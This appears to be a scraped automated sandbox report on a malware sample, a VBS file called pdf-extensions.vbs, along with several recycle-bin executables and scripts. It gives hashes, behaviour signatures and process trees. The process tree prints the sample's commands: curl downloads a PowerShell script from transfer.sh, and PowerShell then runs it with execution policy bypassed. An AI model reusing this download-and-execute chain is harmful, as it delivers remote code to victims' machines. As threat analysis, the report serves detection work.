Overview
overview
10Static
static
1$RECYCLE.B...GOK.js
windows7-x64
10$RECYCLE.B...GOK.js
windows10-2004-x64
10$RECYCLE.B...KV.scr
windows7-x64
1$RECYCLE.B...KV.scr
windows10-2004-x64
1$RECYCLE.B...XJ.exe
windows7-x64
3$RECYCLE.B...XJ.exe
windows10-2004-x64
3$RECYCLE.B...6RL.js
windows7-x64
10$RECYCLE.B...6RL.js
windows10-2004-x64
10$RECYCLE.B...IB.exe
windows7-x64
1$RECYCLE.B...IB.exe
windows10-2004-x64
1$RECYCLE.B...S1.bat
windows7-x64
7$RECYCLE.B...S1.bat
windows10-2004-x64
7pdf-extensions.vbs
windows7-x64
3pdf-extensions.vbs
windows10-2004-x64
10Analysis
-
max time kernel
251s -
max time network
397s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
31-03-2023 16:01
Static task
static1
Behavioral task
behavioral1
Sample
$RECYCLE.BIN/$R5K4GOK.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
$RECYCLE.BIN/$R5K4GOK.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
$RECYCLE.BIN/$R7M8AKV.scr
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
$RECYCLE.BIN/$R7M8AKV.scr
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
$RECYCLE.BIN/$RC3SQXJ.exe
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
$RECYCLE.BIN/$RC3SQXJ.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
$RECYCLE.BIN/$RCMX6RL.js
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
$RECYCLE.BIN/$RCMX6RL.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
$RECYCLE.BIN/$RHL25IB.exe
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
$RECYCLE.BIN/$RHL25IB.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral11
Sample
$RECYCLE.BIN/$RJXIQS1.bat
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
$RECYCLE.BIN/$RJXIQS1.bat
Resource
win10v2004-20230220-en
Behavioral task
behavioral13
Sample
pdf-extensions.vbs
Resource
win7-20230220-en
General
-
Target
pdf-extensions.vbs
-
Size
111KB
-
MD5
3fa09c9c6deff87d8c7d42b352ce52b6
-
SHA1
c69283b1d90cd7fbec45521149292956ca4c6a1f
-
SHA256
4b18539613e1c78a58734ef5e60fe4793ca83384930a4172dbe7a008b14fec31
-
SHA512
90696b88151fe173fd2bf64c049b6f7f30493d4daf033f36b9f67f8c94f8b75047df1e7129a119d93bfeafb35007a6341bc745dfac78f817f070c2f9ca44f40e
-
SSDEEP
12:O+h3awpefBNRxkj5H6NPnqkc+h3awpeZ9nF6NPnJo:O+9xYZNRxo5wqh+9xYZlym
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1776 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.execmd.execmd.execmd.exedescription pid process target process PID 1996 wrote to memory of 548 1996 WScript.exe cmd.exe PID 1996 wrote to memory of 548 1996 WScript.exe cmd.exe PID 1996 wrote to memory of 548 1996 WScript.exe cmd.exe PID 548 wrote to memory of 892 548 cmd.exe cmd.exe PID 548 wrote to memory of 892 548 cmd.exe cmd.exe PID 548 wrote to memory of 892 548 cmd.exe cmd.exe PID 1996 wrote to memory of 1676 1996 WScript.exe cmd.exe PID 1996 wrote to memory of 1676 1996 WScript.exe cmd.exe PID 1996 wrote to memory of 1676 1996 WScript.exe cmd.exe PID 1676 wrote to memory of 1004 1676 cmd.exe cmd.exe PID 1676 wrote to memory of 1004 1676 cmd.exe cmd.exe PID 1676 wrote to memory of 1004 1676 cmd.exe cmd.exe PID 1004 wrote to memory of 1776 1004 cmd.exe powershell.exe PID 1004 wrote to memory of 1776 1004 cmd.exe powershell.exe PID 1004 wrote to memory of 1776 1004 cmd.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pdf-extensions.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1776-58-0x000000001B100000-0x000000001B3E2000-memory.dmpFilesize
2.9MB
-
memory/1776-59-0x0000000002410000-0x0000000002418000-memory.dmpFilesize
32KB
-
memory/1776-60-0x0000000002390000-0x0000000002410000-memory.dmpFilesize
512KB
-
memory/1776-61-0x0000000002390000-0x0000000002410000-memory.dmpFilesize
512KB
-
memory/1776-62-0x000000000239B000-0x00000000023D2000-memory.dmpFilesize
220KB